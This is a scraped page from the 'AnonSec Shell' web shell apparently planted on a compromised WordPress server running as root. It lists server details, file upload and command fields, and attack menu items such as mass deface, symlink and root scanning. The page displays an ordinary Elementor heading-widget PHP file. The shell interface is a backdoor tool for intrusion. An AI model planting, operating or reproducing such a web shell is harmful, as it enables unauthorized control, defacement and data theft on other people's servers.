AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 3.137.178.178   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/elementor/modules/atomic-widgets/widgets/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/elementor/modules/atomic-widgets/widgets/atomic-heading.php
<?php
namespace Elementor\Modules\AtomicWidgets\Widgets;

use Elementor\Modules\AtomicWidgets\Controls\Section;
use Elementor\Modules\AtomicWidgets\Controls\Types\Select_Control;
use Elementor\Modules\AtomicWidgets\Controls\Types\Textarea_Control;
use Elementor\Modules\AtomicWidgets\Base\Atomic_Widget_Base;
use Elementor\Modules\AtomicWidgets\Schema\Atomic_Prop;
use Elementor\Utils;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

class Atomic_Heading extends Atomic_Widget_Base {
	public function get_icon() {
		return 'eicon-t-letter';
	}

	public function get_title() {
		return esc_html__( 'Atomic Heading', 'elementor' );
	}

	public function get_name() {
		return 'a-heading';
	}

	protected function render() {
		$settings = $this->get_atomic_settings();

		// TODO: Move the validation/sanitization to the props schema constraints.
		$escaped_tag = Utils::validate_html_tag( $settings['tag'] );
		$escaped_title = esc_html( $settings['title'] );

		$class = '';
		if ( ! empty( $settings['classes'] ) ) {
			$class = "class='" . esc_attr( $settings['classes'] ) . "'";
		}

		// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
		echo "<$escaped_tag $class>$escaped_title</$escaped_tag>";
	}

	protected function define_atomic_controls(): array {
		$tag_control = Select_Control::bind_to( 'tag' )
			->set_label( esc_html__( 'Tag', 'elementor' ) )
			->set_options( [
				[
					'value' => 'h1',
					'label' => 'H1',
				],
				[
					'value' => 'h2',
					'label' => 'H2',
				],
				[
					'value' => 'h3',
					'label' => 'H3',
				],
				[
					'value' => 'h4',
					'label' => 'H4',
				],
				[
					'value' => 'h5',
					'label' => 'H5',
				],
				[
					'value' => 'h6',
					'label' => 'H6',
				],
			]);

		$title_control = Textarea_Control::bind_to( 'title' )
			->set_label( __( 'Title', 'elementor' ) )
			->set_placeholder( __( 'Type your title here', 'elementor' ) );

		$tag_and_title_section = Section::make()
			->set_label( __( 'Content', 'elementor' ) )
			->set_items( [
				$tag_control,
				$title_control,
			]);

		return [
			$tag_and_title_section,
		];
	}

	protected static function define_props_schema(): array {
		return [
			'classes' => Atomic_Prop::make(),

			'tag' => Atomic_Prop::make()
				->default( 'h2' ),

			'title' => Atomic_Prop::make()
				->default( __( 'Your Title Here', 'elementor' ) ),
		];
	}
}

Anon7 - 2022
AnonSec Team